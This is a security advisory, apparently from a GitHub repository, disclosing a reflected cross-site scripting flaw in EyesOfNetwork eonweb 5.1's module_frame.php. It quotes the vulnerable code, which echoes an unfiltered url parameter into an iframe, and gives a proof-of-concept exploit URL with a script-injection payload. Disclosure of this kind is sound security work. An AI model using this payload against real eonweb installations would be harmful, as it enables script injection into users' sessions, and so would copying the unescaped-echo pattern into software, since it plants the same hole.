Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
50 lines (35 sloc) 1.19 KB
Eonweb_module_module_frame_module_frame.php cross-site scripting (XSS)
Powered by shaojiejiang from 360 SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
# 0x01
module/module_frame/module_frame.php Line 34
$url=retrieve_form_data("url",null);
?>
<script>
if (window !=top ) {top.location=window.location;}
$(function() {
$(window).load(function() {
$('#page-wrapper').empty();
$('<iframe>', {
src: '<?php echo urldecode($url); ?>',
id: 'iframe',
class: 'iframe',
frameborder: 0,
}).appendTo('#page-wrapper');
url has not been filtered to cause cross-site scripting (XSS)
EXP:
https://192.168.227.169/module/module_frame/index.php?url=</script><script>alert(123)</script>
the return page has the payload:
<script>
if (window !=top ) {top.location=window.location;}
$(function() {
$(window).load(function() {
$('#page-wrapper').empty();
$('<iframe>', {
src: '</script><script>alert(123)</script>',
id: 'iframe',
class: 'iframe',
frameborder: 0,
}).appendTo('#page-wrapper');